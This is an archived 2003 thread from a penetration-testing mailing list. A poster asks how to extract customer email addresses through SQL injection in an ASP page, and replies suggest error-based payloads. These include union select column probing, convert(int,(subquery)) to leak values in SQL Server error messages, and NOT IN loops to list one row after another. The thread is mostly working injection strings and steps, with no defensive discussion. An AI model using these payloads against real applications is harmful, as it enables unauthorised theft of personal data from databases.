Hello dude,
You cant use "union" or "having" when the original query looks like "select *
from table" or "select image from table", but this disadvantage can be bypass
easily when using convert(int,(your injected query)). Just put an " ' and
convert(int,(injected query)), all data is in your hand :D.
On Thursday 13 February 2003 01:51 am, Panos Dimitriou wrote:
> One solution is to try to find the exact columns to perform a union
> select by replacing 1s with 'foo' when you get the error message "
> operand type clash: text is incompatible with int"
>
> Example:
>
> ') union all select sum(email),1,1,1.... from clients--
> until you get: operand type clash: text is incompatible with int Then
> change the last 1 with 'foo' and continue with 1s, and so on and so
> forth.
>
> The other solution is to try to get all the data through error cycling,
> as you already tried and use NOT IN as follows:
>
> ' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in
> ('anonat_private','othermailat_private',...))) %2b '
>
> I hope this works
>
> Panos Dimitriou
> Director, MSS
>
>
> -----Original Message-----
> From: Daniel Savi [mailto:dssat_private]
> Sent: Wednesday, February 12, 2003 7:49 PM
> To: pen-testat_private
> Subject: SQL injection - get more values
>
>
>
> Hi :)
>
> i'm trying to get some info from clients table and email field....
>
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tryed to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int
>
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> i got this:
> Syntax error converting the varchar value 'anonat_private' to a column of
> data type int
>
> Now, my problem: How can i get other e-mail from table knowing one valid
>
> value?
>
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email
>
> > 'anonat_private')) %2b '
>
> but no success
>
> i think i can use NOT iN, but not sure how to use with convert...
>
> Any tip are welcome!
>
> Thanks
>
> ------------------------------------------------------------------------
> ----
> This list is provided by the SecurityFocus Security Intelligence Alert
> (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
> see:
> https://alerts.securityfocus.com/
>
>
> ---------------------------------------------------------------------------
>- This list is provided by the SecurityFocus Security Intelligence Alert
> (SIA) Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Feb 13 2003 - 07:05:57 PST